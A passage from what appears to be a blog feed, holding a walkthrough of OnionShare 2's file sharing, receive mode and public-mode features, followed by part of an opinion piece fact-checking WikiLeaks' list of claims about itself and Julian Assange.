<li><a href="#running-an-anonymous-dropbox">Running an anonymous dropbox</a></li>
<li><a href="#onionshare-in-your-language">OnionShare in your language</a></li>
</ul>
<h3 id="sharing-files-with-onionshare">Sharing files with OnionShare</h3><p>Here's what OnionShare 2 looks like. When you first open it, it connects to the Tor network.</p>
<p><img src="connecting-to-tor.png" alt=""></p>
<p>Once you're connected, you're in the "Share Files" tab (I'll talk more about the new "Receive Files" tab below).</p>
<p><img src="share-mode1.png" alt=""></p>
<p>To securely and anonymously share files with someone, just drag and drop the files into the OnionShare window. Alternatively, you can click the "Add Files" and "Add Folder" buttons to browse your filesystem.</p>
<h3 id="the-macos-sandbox">The macOS sandbox</h3><p>In Windows and Linux there's just a single "Add" button that lets you select both files and folders. The reason for two separate buttons in the macOS version is a bit complicated, but boils down to a cool new security feature: The macOS sandbox is turned on in OnionShare 2, which means that even if someone manages to exploit a vulnerability in OnionShare to try to hack your computer, they still won't be able to access your data or run programs on your computer without first escaping the sandbox.</p>
<p><img src="share-mode2.png" alt=""></p>
<p>I've dragged all of the files that make up the OnionShare source code into the window. Now, to make them accessible to someone else, I just click "Start sharing".</p>
<h3 id="next-generation-onion-services">Next generation onion services</h3><p><img src="share-mode3.png" alt=""></p>
<p>After clicking the button, I wait a few seconds, and then OnionShare gives me an unguessable Tor address to share. This is also new in OnionShare 2: By default, it uses <a href="https://blog.torproject.org/tors-fall-harvest-next-generation-onion-services">next generation Tor onion services</a>, also known as <code>v3</code> onion addresses. These are onion addresses that look like <code>lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion</code>, as opposed to the old <code>v2</code> kind, that look like <code>elx57ue5uyfplgva.onion</code>.</p>
<p><code>v3</code> onions are much more secure than <code>v2</code> onions for a variety of reasons, but they can be a bit unwieldy and hard to type (for example, if you're using OnionShare to move files between two computers that are both in front of you). You can still use <code>v2</code> onion addresses if you want by going into Settings and choosing "Use legacy addresses".</p>
<p>Also, you might notice that the OnionShare address is using HTTP and not HTTPS, but this is actually perfectly fine. HTTPS adds a layer of encryption between a web browser and a web server, but Tor onion services are already end-to-end encrypted, so HTTPS is not necessary (it's also not feasible without browser warnings: Let's Encrypt doesn't sign HTTPS certificates for <code>.onion</code> sites). Unlike loading normal websites in Tor Browser, when you load onion websites, there is no Tor exit node that could spy on the traffic -- all of the traffic stays within the Tor network.</p>
<p>Now, I need to send this web address to my friend who I'm sharing files with. The easiest way to do this securely is to use an encrypted messaging app like Signal Desktop, Wire, Keybase, or iMessage -- or, if you're oldschool, Jabber/OTR. If the files you're sharing aren't especially sensitive, you can also share this web address in a way that is easily spied on but might be more convenient, like in a Facebook, Twitter, Google Hangouts, Slack, or Discord message, or in an email.</p>
<p><img src="torbrowser-share1.png" alt=""></p>
<p>My friend then opens Tor Browser and loads the OnionShare address I sent her. She sees a website with a list of the files I'm sharing, and a "Download Files" button.</p>
<p>The key thing to understand about how OnionShare works is that this website is hosted <em>directly on my laptop</em>, not on a server in a data center somewhere. If I suspend my laptop, that link won't work anymore. If I close OnionShare before the files have been downloaded, then that Tor web address simply disappears from the internet. Because of this, OnionShare always takes place in real-time -- you and the person you're sharing files with need to both be online <em>at the same time</em>.</p>
<h3 id="onionshare-doesn-t-zip-if-you-share-just-one-file">OnionShare doesn't zip if you share just one file</h3><p>My friend then downloads the files, which are automatically zipped up. In this case, the zip file is called <code>onionshare_snwga4.zip</code> (the last part of the filename is random), and when she unzips it, she can see a copy of the OnionShare source code I sent. A new feature in OnionShare 2 is that if you share just a single file, it no longer zips it up (but still compresses it with gzip, built into the HTTP protocol).</p>
<p><img src="share-mode4.png" alt=""></p>
<p>Back on my computer, OnionShare automatically stopped sharing the moment the files finished sending -- and when this happened, the OnionShare address completely disappeared from the internet, never to exist again.</p>
<h3 id="onionshare-addresses-are-ephemeral-by-default">OnionShare addresses are ephemeral by default</h3><p>OnionShare addresses are <em>ephemeral</em>, and intended for one-time use. (For example, if someone sends you an OnionShare address in a Twitter DM, and a few minutes later you load it and download the files, that address won't exist anymore in the future. If anyone ever gains access to your Twitter DM history, that OnionShare address will no longer work.)</p>
<p><img src="torbrowser-share2.png" alt=""></p>
<p>As you can see, after my friend finished downloading the files I sent her, that OnionShare address ceased to exist.</p>
<p>This is the default behavior of OnionShare, but you might want to use OnionShare to send files to a group of people, not just one person, in which case you don't want it to be ephemeral. In this case, you can uncheck "Stop sharing after files have been sent" in the Settings, and then multiple people can download your files, and you'll continue sharing until you manually click "Stop sharing" or close OnionShare.</p>
<h3 id="receiving-files-with-onionshare">Receiving files with OnionShare</h3><p><img src="receive-mode1.png" alt=""></p>
<p>All of this is, more or less, how OnionShare has always worked. But the "Receive Files" tab is brand new to OnionShare 2. And it's still just the beginning -- we have plans for adding more tabs to OnionShare in the future, such as a <a href="https://github.com/micahflee/onionshare/issues/791">static website sharing</a> tab.</p>
<p>When you use OnionShare to receive files, you turn your computer into an anonymous dropbox -- I like to think of it as a super lightweight version of <a href="https://securedrop.org/">SecureDrop</a> that anyone can run on their own laptop, for free, without needing to set up any infrastructure or do any systems administration. (However, it's not as robust, or secure, as SecureDrop, which enforces isolated environments in a way that OnionShare can't.)</p>
<p><img src="receive-mode2.png" alt=""></p>
<p>A few seconds after I clicked "Start Receive Mode", OnionShare gave me an unguessable Tor address, which I share with my friend the same way I did with the share mode address. But this time, instead of me sending files to her, <em>she can send files to me</em>, and all she needs is Tor Browser -- she doesn't need OnionShare herself.</p>
<p>If I publish this OnionShare address, <em>anyone can send files to me</em>, without me having any way to know who they are (because they'll be using Tor), and in a way that is end-to-end encrypted, so eavesdroppers spying on either of our networks can't access the files, or even realize that we're using OnionShare. To network eavesdroppers, all they'll be able to tell is that we're both using Tor.</p>
<p><img src="torbrowser-receive1.png" alt=""></p>
<p>My friend simply clicks Browse, finds the files she wants to send, and clicks "Send Files".</p>
<p><img src="receive-mode3.png" alt=""></p>
<p>Over in OnionShare on my computer, I can see the status of all of the files that I'm receiving. Because OnionShare uses Tor onion services, I don't actually have any way of knowing <em>who</em> is sending files to me -- if I want to make it so only very specific people can send me files, I need to securely share the OnionShare address to only those people. My computer will continue to act as an anonymous dropbox until I click "Stop Receive Mode", or close OnionShare. And, just like with share mode, if I suspend my laptop, the OnionShare address stops working.</p>
<p><img src="receive-mode-finder.png" alt=""></p>
<p>The files that I receive get saved to <code>~/OnionShare</code>, and they're automatically organized by date and time.</p>
<h3 id="only-open-things-from-people-you-trust-or-if-you-know-what-you-are-doing">Only open things from people you trust, or if you know what you are doing</h3><p>Now that you know how the "Receive Files" tab works, <em>be very careful with it</em>, and make sure to take the prominent warning to heart:</p>
<blockquote><p><strong>Some files can potentially take control of your computer if you open them. Only open things from people you trust, or if you know what you are doing.</strong></p>
</blockquote>
<p>All of the warnings about not opening email attachments apply just as much here. In this example, I received <code>gimp-2.10.8-x86_64-2.dmg</code>, which is an installer for the open source image editing software GIMP. But, it could easily be a modified version of that installer that has malware hidden inside. And if someone sends you <code>.docx</code> or <code>.pdf</code> files, they could contain malware that could try to hack you through a vulnerability in Microsoft Word or Adobe Reader. How to safely open files you receive is <em>outside of the scope of OnionShare</em>. Use this feature with caution.</p>
<h3 id="public-onionshare-addresses">Public OnionShare addresses</h3><p>OnionShare 2 has a new feature: Public mode. But before explaining what it does, first I'll explain how OnionShare addresses work without it.</p>
<p>By default, OnionShare addresses look like <code>http://[tor-address].onion/[slug]</code>, where the slug is two random words out of a list of 7,776 words (technically, this is a 2-word <a href="https://theintercept.com/2015/03/26/passphrases-can-memorize-attackers-cant-guess/">diceware passphrase</a>).</p>
<p>The idea is that if an attacker could figure out the <code>tor-address</code> part of the address, they still can't download the files you're sharing, or upload files to your computer, without first knowing the slug. The slug is, essentially, a password. (This is less important when using <code>v3</code> onion services. The old <code>v2</code> onion services have a known issue where, if the onion connection happens to get facilitated by a malicious Tor node, that node could learn the <code>tor-address</code> part. This is one of the reasons that <code>v3</code> onions are more secure.)</p>
<p>But the slug is only two words, so what stops the attacker from guessing it, by guessing every possible 2-word slug? The wordlist that OnionShare uses is public, after all.</p>
<p><img src="slug-guess.png" alt=""></p>
<p>OnionShare counts 404 errors (file-not-found web requests), and on the 20th 404 error it assumes that someone is trying to guess the slug and automatically stops the server.</p>
<p>This gives the attacker 20 chances to guess the two words correctly. Because the words are chosen from a list of 7,776 words, that means there are 7,776^2, or over 60 million, possible slugs. Which basically means that if an attacker tries to guess the slug, they have a 0.00003% chance of getting it right within their only 20 chances, and a 99.99996% chance of failing, and forcing OnionShare to stop sharing.</p>
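<p>To sanity-check those numbers in Python:</p>

```python
# The arithmetic behind the 404 lockout: slugs are two diceware words
# drawn from a 7,776-word list, and an attacker gets 20 guesses before
# the server shuts itself down.
WORDLIST_SIZE = 7776
GUESS_LIMIT = 20

slugs = WORDLIST_SIZE ** 2          # 60,466,176 possible slugs
p_success = GUESS_LIMIT / slugs     # chance of winning within 20 guesses

print(f"{slugs:,} possible slugs")
print(f"{p_success:.7%} chance of guessing the slug in {GUESS_LIMIT} tries")
```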
<p>This works great, but what if you <em>want</em> anyone to be able to load your OnionShare address?</p>
<p>For example, let's say you want to anonymously publish some files. You disable the "Stop sharing after files have been sent" setting, drag the files into OnionShare, start sharing, and tweet the OnionShare address. It turns out that anyone on the internet who sees the tweet can force your server to stop just by making 20 404 errors. (This situation actually happened to someone, by the way, and their server kept shutting down because people kept making 404 errors.)</p>
<p>This is the use case that public mode was built for. If you want to publicly share an OnionShare address, just go to Settings and check the box next to "Public mode". When you start sharing, the OnionShare address will look like <code>http://[tor-address].onion/</code>, without the slug, and the server will remain up no matter how many 404 errors it gets.</p>
<h3 id="running-an-anonymous-dropbox">Running an anonymous dropbox</h3><p>You've seen receive mode, which is great for allowing people to privately send you files. But if you want to allow <em>anyone</em> to privately send you files, there are a few settings you'll want to consider using.</p>
<p>First, you'll definitely want to enable public mode.</p>
<p>Second, you'll also want to go into Settings and enable "Use a persistent address". With this setting, when you stop an OnionShare server and then start it again, you'll get the exact same onion address as you had last time. This gives you the flexibility to, for example, reboot your computer and start OnionShare again, without having to switch OnionShare addresses.</p>
<p>And finally, you may want to run your anonymous dropbox on a headless Linux server, rather than your normal daily workstation. OnionShare comes with two binaries, <code>onionshare</code> (the command line version) and <code>onionshare-gui</code> (the graphical version). Both of them share the same configuration file -- in Linux, this is in <code>~/.config/onionshare/onionshare.json</code>. So, using the graphical version of OnionShare, choose all of the settings that you'd like, and then copy <code>onionshare.json</code> to your server, and run OnionShare like this:</p>
<pre><code>$ onionshare --receive
OnionShare 2.0 | https://onionshare.org/
Connecting to the Tor network: 100% - Done
Setting up onion service on port 17612.
* Running on http://127.0.0.1:17612/ (Press CTRL+C to quit)
Files sent to you appear in this folder: /home/user/OnionShare
Warning: Receive mode lets people upload files to your computer. Some files can potentially take control of your computer if you open them. Only open things from people you trust, or if you know what you are doing.
Give this address to the sender:
http://v2oxpolhvyd3kh44drt6gtz57v7wwun2twddcw3xhim2kgu2vvcewvqd.onion
Press Ctrl+C to stop the server
127.0.0.1 - - [18/Feb/2019 10:48:04] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:06] "GET /static/css/style.css HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:07] "GET /static/js/receive-noscript.js HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:07] "GET /static/js/receive.js HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:07] "GET /static/js/jquery-3.3.1.min.js HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:07] "GET /static/img/logo.png HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:08] "GET /static/img/logo_large.png HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:10] "GET /static/img/favicon.ico HTTP/1.1" 200 -
Feb 18, 10:48AM: Upload of total size 102.1 KiB is starting
=> 101.9 KiB 2016_tax_return.pdf
Received: /home/user/OnionShare/2019-02-18/10.48.18/2016_tax_return.pdf
127.0.0.1 - - [18/Feb/2019 10:48:20] "POST /upload-ajax HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:21] "GET /static/img/ajax.gif HTTP/1.1" 200 -
</code></pre>
<h3 id="onionshare-in-your-language">OnionShare in your language</h3><p><img src="onionshare-persian.png" alt=""></p>
<p>Finally, one of the things I'm most excited about in OnionShare 2 is that it has now been translated into twelve new languages, making OnionShare accessible to a considerable swath of humanity. Some of the major languages that OnionShare 2 is translated into include Spanish (400 million native speakers), Portuguese (215 million), Russian (170 million), and Japanese (130 million). (These numbers <a href="https://www.babbel.com/en/magazine/the-10-most-spoken-languages-in-the-world">come from</a> Babbel magazine.)</p>
<p>The new languages include: Bengali (বাংলা), Catalan (Català), Danish (Dansk), French (Français), Greek (Ελληνικά), Italian (Italiano), Japanese (日本語), Persian (فارسی), Brazilian Portuguese (Português Brasil), Russian (Русский), Spanish (Español), and Swedish (Svenska); more languages will be included in the future. If you're a native speaker of a non-English language and are interested in contributing to OnionShare, you can find <a href="https://github.com/micahflee/onionshare/wiki/Translating">instructions</a> for helping on the wiki.</p>
<p>I hope you like OnionShare 2!</p>
Lies That WikiLeaks Tells You2019-01-11T00:00:00ZMicah Leeurn:uuid:9b0d405b-885f-3528-ac72-c32880499421<p>Last weekend, WikiLeaks sent an email to journalists with a list of 140 things not to say about WikiLeaks and Julian Assange because they are "false and defamatory." Reuters first <a href="https://www.reuters.com/article/us-britain-ecuador-assange/wikileaks-tells-reporters-140-things-not-to-say-about-julian-assange-idUSKCN1P00NN">broke</a> the story, and the next day Emma Best <a href="https://emma.best/2019/01/07/140-things-youre-not-allowed-to-say-about-assange-or-wikileaks/">published</a> the complete list. Many of the things on the list can't actually be "false" because they're subjective or nuanced ("It is false and defamatory to suggest that Julian Assange is a 'hacker'"), and many aren't defamatory, even if they are false ("It is false and defamatory to suggest that Julian Assange’s profession is 'computer programmer'.").</p>
<p>And many of the things on the list are <em>true</em>, and WikiLeaks/Assange are being misleading. Some directly relate to me -- they came from Twitter fights I've had with WikiLeaks and its minions. So I thought I'd fact check WikiLeaks' "false and defamatory" censorship list. This is by no means an exhaustive fact check -- for example, I'm not covering the list items about the two Swedish women who accused Assange of rape, though I'm pretty confident a lot of that stuff is misleading as well. Before digging into the misinformation, I first want to take a moment to discuss how pathetic this is.</p>
<p>First, the email starts out with, "CONFIDENTIAL LEGAL COMMUNICATION. NOT FOR PUBLICATION," but whoever sent a copy of it to Reuters and Emma Best didn't break any off-the-record agreement with WikiLeaks. That's not how that works, which WikiLeaks really ought to know. Simply stating that your email is not for publication doesn't make it off-the-record -- both parties have to agree.</p>
<p>Second, while it's been clear for some time that WikiLeaks isn't the pro-transparency, pro-free speech, anti-censorship organization that it pretends to be, this latest feeble attempt at ego-driven image management is just sad. It reminds me of when WikiLeaks <a href="https://www.newsweek.com/wikileaks-documentary-makers-accuse-assange-censorship-626613">used legal threats to try to censor</a> the documentary film <em>Risk (2016)</em> because the filmmakers wouldn't remove scenes of Assange, who consented to being filmed, making sexist comments about women.</p>
<h3 id="secret-dms-with-donald-trump-jr">Secret DMs with Donald Trump, Jr.</h3><p>In November 2017, the Atlantic <a href="https://www.theatlantic.com/politics/archive/2017/11/the-secret-correspondence-between-donald-trump-jr-and-wikileaks/545738/">revealed</a> secret Twitter direct messages between @wikileaks and @DonaldJTrumpJr. WikiLeaks did most of the fanboying, but Trump Jr. responded some of the time, too.</p>
<p>Highlights of the exchange include:</p>
<ul>
<li>WikiLeaks asked Trump Jr. to, "Leak us one or more of your father’s tax returns," arguing that biased liberal media might publish them at any time, and that, "If we publish them it will dramatically improve the perception of our impartiality," adding, "That means that the vast amount of stuff that we are publishing on Clinton will have much higher impact, because it won’t be perceived as coming from a ‘pro-Trump’ ‘pro-Russia’ source." (Had Trump sent Assange a tax return, I have no doubt that WikiLeaks would have pretended it came from a whistleblower, rather than being an officially sanctioned leak.)</li>
<li>WikiLeaks suggested that Trump scream about rigged elections if he lost against Clinton: “Hi Don if your father ‘loses’ we think it is much more interesting if he DOES NOT conceed [sic] and spends time CHALLENGING the media and other types of rigging that occurred -- as he has implied that he might do.”</li>
</ul>
<p>After Trump won the election:</p>
<ul>
<li>WikiLeaks asked if president-elect Trump could award Assange with an Australian ambassadorship: "It would be real easy and helpful for your dad to suggest that Australia appoint Assange ambassador to [Washington,] DC."</li>
</ul>
<p>Now, back to the "false and defamatory" claims.</p>
<p><em>It is false and defamatory to suggest that Julian Assange or WikiLeaks has ever colluded with or conspired with, or compromised the integrity of its journalism for, any political campaign or State [in fact, published communication records show WikiLeaks doing exactly the opposite: rejecting approaches by Cambridge Analytica and the Trump campaign for information on its pending publications, see <a href="https://defend.wikileaks.org/">https://defend.wikileaks.org/</a>].</em></p>
<p>I'd argue that the secret exchange with Trump Jr. is "conspiring with" a political campaign, and that it compromised the integrity of WikiLeaks as an objective news organization. Had they been up-front about their pro-Trump bias the entire time, it would have still been unethical, but it wouldn't have been such a betrayal.</p>
<p><em>It is false and defamatory to suggest that WikiLeaks tried to have the Trump administration appoint Julian Assange as an ambassador or to have any other person or state appoint him as an ambassador.</em></p>
<p>This one is a pretty blatant lie, considering WikiLeaks tried to have the Trump administration get Australia to appoint Julian Assange as an ambassador. And it doesn't really help Assange's case that he tweeted about it:</p>
<p><img src="wikileaks-ambassadorship.png" alt=""></p>
<h3 id="guccifer-2-0-the-gru-run-persona-that-provided-wikileaks-with-dnc-and-podesta-emails">Guccifer 2.0, the GRU-run persona that provided WikiLeaks with DNC and Podesta emails</h3><p>Guccifer 2.0, the online persona that claimed to be a Romanian "lone hacker," took credit for hacking into the DNC, and began leaking DNC emails to journalists. But the Mueller investigation released a <a href="https://theintercept.com/2018/07/18/mueller-indictment-russian-hackers/">mountain of evidence</a> that shows that this persona, along with faux-leak site DCLeaks, the hackers responsible for the spearphishing campaign that hacked Clinton campaign chairman John Podesta's Gmail account, and the hackers who hacked the DCCC and DNC networks, are all controlled by specific Russian military intelligence officers, working for the GRU.</p>
<p>Check the link above for more details, but here's a quick example. The spearphishing email that hacked Podesta's account included a Bitly link. The email address that registered that Bitly account, "dirbinsaabol@mail.com," was also used to sign up for an "online cryptocurrency service" (probably BitPay), and that account was used to pay for registering the domain dcleaks.com. Oh, also, the @Guccifer_2 Twitter account always logged in from a VPN service, except for once, when they <a href="https://www.thedailybeast.com/exclusive-lone-dnc-hacker-guccifer-20-slipped-up-and-revealed-he-was-a-russian-intelligence-officer">apparently forgot to connect to the VPN</a> and logged in from an IP address that geolocated to a GRU building in Moscow.</p>
<p>According to Mueller's indictment of GRU hackers, WikiLeaks contacted Guccifer 2.0 asking that they "[s]end any new material [stolen from the DNC] here for us to review and it will have a much higher impact than what you are doing." When Guccifer 2.0 ignored them, they asked again a few weeks later: “if you have anything hillary related we want it in the next tweo [sic] days prefable [sic] because the DNC [Democratic National Convention] is approaching and she will solidify bernie supporters behind her after," adding that "we think trump has only a 25% chance of winning against hillary … so conflict between bernie and hillary is interesting."</p>
<p>In response, Guccifer 2.0 sent a plaintext email to WikiLeaks, with an encrypted attachment called "wk dnc link1.txt.gpg" saying, "the encrypted file contained instructions on how to access an online archive of stolen DNC documents." Just over a week later, WikiLeaks began publishing the DNC emails.</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange is, or has ever been, close to the Russian state, the Kremlin or Vladimir Putin.</em></p>
<p>So this one is a bit more nuanced. The source for WikiLeaks' most influential leak, the DNC and Podesta emails, was a bunch of GRU officers trying to influence the 2016 election. And at various times WikiLeaks spread misinformation in order to protect their source's identity (see below). But does this mean that WikiLeaks or Julian Assange was "close to" the GRU?</p>
<p>Guccifer 2.0 was also a source for many other journalists (although they all named their source as Guccifer 2.0, while WikiLeaks pretended their source was a whistleblower), and it's plausible that Assange didn't realize he was communicating with GRU officers and thought it was a "lone hacker." So, I'm not really sure. But in any case, it's ridiculous for WikiLeaks to think this topic should be off limits to journalists, considering the Russian military hacked a U.S. political party, leaked emails to WikiLeaks, and WikiLeaks published them at key points in order to hurt the Clinton campaign. And once it became clear to Assange who his source actually was, he chose to keep up the misinformation.</p>
<h2 id="assange-breathing-life-into-the-seth-rich-conspiracy-theory">Assange breathing life into the Seth Rich conspiracy theory</h2><p>Shortly after WikiLeaks began publishing DNC emails, Assange went on Dutch TV and <a href="https://www.dispatch.com/news/20180715/wikileaks-founder-assange-lied-to-protect-russia-charges-on-hacked-emails-suggest">encouraged</a> the conspiracy theory that Seth Rich, a former DNC staffer who was killed in Washington, DC in what police believe was a botched robbery, was his source, and that the Democrats had him murdered for leaking emails to WikiLeaks. The exchange goes like this:</p>
<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/Kp7FkLBRpKg" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><p><strong>Assange brings up Seth Rich out of nowhere:</strong> "There's a 27-year-old, who works for the DNC, who was shot in the back -- murdered -- just a few weeks ago, for unknown reasons as he was walking down the street in Washington."</p>
<p><strong>Host:</strong> "That was just a robbery, I believe, wasn't it?"</p>
<p><strong>Assange:</strong> "No. There's no finding."</p>
<p><strong>Host:</strong> "What are you suggesting?"</p>
<p><strong>Assange:</strong> "I'm suggesting that our sources take risks, and they become concerned to see things occurring like that--"</p>
<p><strong>Host:</strong> "But was he one of your sources then?"</p>
<p><strong>Assange:</strong> "We don't comment on who our sources are, but--"</p>
<p><strong>Host:</strong> "Then why make the suggestion? About a young guy being shot in the streets of Washington?"</p>
<p><strong>Assange:</strong> "Because we have to understand how high the stakes are in the United States, and that our sources are -- you know, our sources face serious risks. That's why they come to us, so that we can protect their anonymity."</p>
<p><strong>Host:</strong> "But it's quite something to suggest a murder. That's basically what you're doing."</p>
<p><strong>Assange:</strong> "Well, others have suggested that. We are investigating to understand what happened in that situation, with Seth Rich. I think it is a concerning situation. There's not a conclusion yet, we wouldn't be willing to say a conclusion, but we are concerned about it. And more important, a variety of WikiLeaks sources are concerned when that kind of thing happens."</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange claimed that any person or entity was their source for WikiLeaks’ 2016 U.S. election publications [it is defamatory because Julian Assange’s professional reputation is substantially based on source protection].</em></p>
<p>So yup, that's a straight-up lie. I guess unless you try to argue that Assange's interaction on that show wasn't a "claim".</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever published, uttered or tried to promote alleged conspiracy theories claiming “John Podesta engaged in satanic rituals”, the “Democratic Party had Seth Rich Killed”, “Clinton wore earpieces to the 2016 US election debates”, on “Clinton’s health” or “Clinton kidnapping children”.</em></p>
<p>That's another lie. Assange definitely "uttered" and "tried to promote" the Seth Rich conspiracy theory.</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever stated or suggested that any particular person was their source for any publication, including Seth Rich.</em></p>
<p>Another lie.</p>
<p>Also, Assange didn't just suggest that Seth Rich was his source, he also actively lied about who his source <em>wasn't</em>. As a guest on Sean Hannity's Fox News show (Assange is a classy guy, I know), he said: "Our source is not the Russian government, and is not a state party."</p>
<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/uyCOy25GdjQ" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><h3 id="the-pizzagate-conspiracy-theory">The Pizzagate conspiracy theory</h3><p>After WikiLeaks published the Podesta emails and right-wing idiots started sifting through them, they decided that whenever an email mentioned going out for pizza, it was actually a secret code. They concluded that these "pizza" references could only mean that high-ranking Democrats were actually involved in a child sex ring based in the basement of the Comet Ping Pong pizza place in Washington, DC. Edgar Maddison Welch decided to "investigate" Pizzagate, and drove up to DC from North Carolina, bringing three guns with him. When he got to Comet Ping Pong (which, by the way, doesn't have a basement), he fired a gun. He was <a href="https://www.nytimes.com/2017/06/22/us/pizzagate-attack-sentence.html">sentenced</a> to four years in prison.</p>
<p><em>It is false and defamatory to suggest that Julian Assange or WikiLeaks promoted or invented the “pizzagate” conspiracy theory.</em></p>
<p>It would be a lot easier to believe that WikiLeaks didn't promote the Pizzagate conspiracy if they weren't hosting a wiki page in order to discuss the conspiracy theorists' findings at <a href="https://our.wikileaks.org/Pizzagate">https://our.wikileaks.org/Pizzagate</a>. (Shocking, right? Who knew WikiLeaks actually included a wiki!)</p>
<p>To be fair, the wiki pages include a disclaimer saying, "It is NOT an endorsed by WikiLeaks for quality of the material, content, or judgement" -- but I mean seriously. You don't see ProPublica hosting community forums for conspiracy theorists. Why is WikiLeaks?</p>
<h3 id="other-conspiracy-theories">Other conspiracy theories</h3><p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever published, uttered or tried to promote a “conspiracy theory”.</em></p>
<p>Seth Rich and Pizzagate are far from the only ones. WikiLeaks and Assange make off-hand conspiracy-ridden comments on a regular basis. In fact, I <a href="https://twitter.com/wikileaks/status/1000795757983780865">noticed</a> WikiLeaks dip into the QAnon conspiracy theory in a reply to Roseanne Barr (if you'd like to lose some critical thinking skills, read the Twitter thread WikiLeaks is commenting on, and the replies to WikiLeaks; the QAnon people were pissed that WikiLeaks wasn't a true believer):</p>
<p><img src="wikileaks-conspiracy1.png" alt=""></p>
<p>So, as one does on Twitter, I made fun of them. But I guess they are pro-censorship after all because they blocked me for it. (Just kidding, blocking people on Twitter obviously isn't censorship.)</p>
<p><img src="wikileaks-conspiracy2.png" alt=""></p>
<h3 id="freedom-of-the-press-foundation-and-securedrop">Freedom of the Press Foundation and SecureDrop</h3><p>After Emma Best published the complete list of 140 things you're not allowed to say about WikiLeaks, WikiLeaks <a href="https://twitter.com/wikileaks/status/1082279551521169408">tweeted out</a> a link to the list themselves, which they published on Pastebin. Unsurprisingly, they edited the list first, presumably to remove claims they have a harder time defending. Here's one of the ones they removed:</p>
<p><em>It is false and defamatory to deny that Julian Assange co-founded the Freedom of the Press Foundation with John Perry Barlow.</em></p>
<p>WikiLeaks and Assange have done a good job at deleting the tweets where they first made this claim, but it's not true.</p>
<p>Barlow was one of the co-founders of FPF, and he did have a conversation with Assange about starting a new organization that could help bypass the financial censorship WikiLeaks was facing. But that's the extent of Assange's role. Having a conversation with a founder doesn't make you a founder.</p>
<p>However, during a Twitter fight I was involved in, an official WikiLeaks account did make the <a href="https://twitter.com/WLTaskForce/status/826569015095021568">claim</a> that <em>I'm not</em> a co-founder of FPF.</p>
<p><img src="wltaskforce-fpf-founder.png" alt=""></p>
<p>When FPF was founded, I was the first (and, at the time, only) staff member, the chief technology officer. I built the FPF website, including the crowd-funding platform that we used to help WikiLeaks bypass financial censorship. Here's the initial commit I made on the FPF website, from October 30, 2012 (FPF officially launched on December 17, 2012):</p>
<p><img src="fpf-initial-commit.png" alt=""></p>
<p>After starting work at The Intercept, I stepped down as CTO and was voted onto the board of directors.</p>
<p>That Twitter fight started because I <a href="https://twitter.com/micahflee/status/826560111304773632">called out</a> WikiLeaks for taking credit for Aaron Swartz's work, after he died and couldn't defend himself.</p>
<p><img src="securedrop.png" alt=""></p>
<p>It apparently struck such a chord that WikiLeaks included this in their "false and defamatory" censorship list:</p>
<p><em>It is false and defamatory to suggest that Julian Assange is not the sole first inventor of cryptographically secure “drop boxes” to protect whistleblowers and journalistic sources.</em></p>
<p>It's true that Aaron was inspired by WikiLeaks when he began developing the DeadDrop project (which was later renamed to SecureDrop) in June 2011. But SecureDrop isn't "WikiLeaks technology." The WikiLeaks leak platform is proprietary, and unlike SecureDrop (which is a free software project) has never had a public security audit. Saying SecureDrop is WikiLeaks technology is a bit like saying "the iPhone is Nokia technology."</p>
<p>But both leak platforms share a common critical component: anonymity of sources is enforced by making the leak site only available using a Tor onion service. Tor Project, not WikiLeaks, deserves the credit for the "cryptographically secure" part of the WikiLeaks leak platform.</p>
<p>It could be true that WikiLeaks was the first to <em>have the idea</em> of using a Tor onion service as a whistleblower drop box though. It was a good idea.</p>
<h3 id="defending-vladimir-putin">Defending Vladimir Putin</h3><p>In 2015, an anonymous source leaked a massive trove of tax haven data to a German newspaper, which enlisted the help of the International Consortium of Investigative Journalists (ICIJ) to report on it all. ICIJ shared the data with dozens of partners, including the <a href="https://www.occrp.org/en">Organized Crime & Corruption Reporting Project</a> (OCCRP). This leak was known as the Panama Papers, and it revealed scandals around the world, investigated by over 100 newsrooms and reported in 25 languages.</p>
<p>One of these scandals, reported by OCCRP in collaboration with investigative journalists at the Russian newspaper Novaya Gazeta, <a href="https://www.occrp.org/en/panamapapers/persons/putin/">implicated Putin's close friend Sergei Roldugin</a>. Roldugin, a cellist, was implicated in stealing $230 million from Russian taxpayers in 2007. Putin was angry about the scandal, and so was WikiLeaks, it turned out.</p>
<p><img src="wikileaks-putin1.png" alt=""></p>
<p><img src="wikileaks-putin2.png" alt=""></p>
<p>Keep in mind that the documents were real, and the Putin-linked corruption that was revealed actually happened. After WikiLeaks tweeted in Putin's defense, <a href="https://twitter.com/micahflee/status/950778944940158976">Putin himself cited WikiLeaks</a> in order to dismiss the scandal:</p>
<blockquote><p>“Besides,” [Putin] added, “we now know from WikiLeaks that officials and state agencies in the United States are behind all this.”</p>
</blockquote>
<p><em>It is false and defamatory to suggest that Julian Assange called the Panama Papers “a Soros-funded attack against Putin” [see <a href="https://twitter.com/wikileaks/status/717810984673484800">https://twitter.com/wikileaks/status/717810984673484800</a>].</em></p>
<p>Sure, they didn't use the words "Soros-funded," though they included "Open Society Institute & Soros Foundations Network" in their tweet calling this (true, brave, risky for Russian journalists) investigative journalism an "attack story on Putin."</p>
<p>I wrote a <a href="https://twitter.com/micahflee/status/950778501270917120">Twitter thread</a> about this topic that goes into greater detail. That's just one example of WikiLeaks protecting Putin's government. Here's another:</p>
